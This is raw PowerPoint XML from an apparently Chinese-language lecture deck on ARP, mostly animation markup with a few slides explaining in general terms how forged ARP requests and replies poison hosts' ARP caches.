                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="145" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="146" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="147" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="148" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="149" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="150" presetID="29" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">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cBhvr>
                                        <p:cTn id="152" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="153" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="154" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="155" presetID="29" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="158" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="160" presetID="29" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="161" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="162" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="163" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="16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utoUpdateAnimBg="0"/>
      <p:bldP spid="25617" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25618" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25619" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25620" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25621" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25622" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25623" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25623" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25624" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25624" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25646" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25646" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25646" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25647" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25647" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25647" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25648" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25648" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25648" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25649" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25649" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25649" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25650" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25650" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25650" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25651" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25651" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25651" grpId="2" bldLvl="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a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议存在的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广播请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（广播），全部接收者更新或添加关于发送者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>动态刷新</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求，错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP, MAC&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，污染大家的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单播应答：无状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无问自答：主动的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答会被视为有效信息而接收</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>张冠李戴：发送错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答，错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接收者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP, MAC&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4140627591"/>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标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址解析协议的安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="266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4"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35"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6636"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6637"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38" name="Straight Connector 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3944144" y="3958432"/>
            <a:ext cx="425450" cy="531812"/>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26639"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6640"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41"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2"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3"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4"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5"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6"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26647" name="Oval Callout 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="4005263"/>
            <a:ext cx="1584325" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70106"/>
              <a:gd name="adj2" fmla="val 64023"/>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我是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="26649" name="Table 41"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3213100"/>
          <a:ext cx="3348038" cy="102553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6078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192.168.1.1</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:00:A2</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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360019">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71996" marB="71996"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r h="30471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000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>…</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>…</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26663"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4" name="Explosion 2 42"/>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5" name="Explosion 2 43"/>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6" name="Explosion 2 44"/>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 name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{81556F20-9EF8-4651-B294-D3B86E7C8135}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>127</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3096132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29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26629"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26628"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26633"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26633"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26636"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26636"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26634"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26634"/>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26637"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2663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6638"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26638"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26640"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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26627"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26627"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26630"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26630"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26631"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26631"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26632"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
